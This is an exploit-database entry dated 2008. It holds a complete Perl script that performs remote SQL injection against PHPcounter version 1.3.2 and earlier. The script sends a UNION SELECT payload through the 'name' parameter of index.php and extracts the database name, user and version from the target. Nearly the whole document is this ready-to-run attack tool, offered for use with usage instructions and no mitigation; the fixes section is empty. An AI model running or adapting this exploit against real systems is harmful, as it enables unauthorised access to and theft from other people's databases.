PHPcounter <= 1.3.2 (index.php name) Remote SQL Injection Exploit

2008-09-28 23:01:08

#!/usr/bin/perl
# -------------------------------------------------
# PHPcounter <= 1.3.2 Remote SQL Injection Exploit
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
# Discovered On: 28/09/2008
# -------------------------------------------------

use strict;
use LWP::UserAgent;

my $host = shift @ARGV;
my $path = "/index.php?name=";
my $evil = "'union select 0,0,0,concat(0x24,database(),0x3a,user(),0x3a,version(),0x24)'/*";

show() unless $host =~ /^http(s)?:\/\/(.+?)$/;

my $http_s = new LWP::UserAgent;
my $request = $http_s->get($host.$path.$evil);

if($request->is_success and $request->content =~ /\$(.+?)\$/) {
print "[+] $1\n";
exit;
}
else {
print "[!] ".$request->status_line."\n";
exit;
}

sub show {
print "[?] Usage: perl $0 http://[host]\n";
exit;
}

#

Fixes

No fixes

In order to submit a new fix you need to be registered.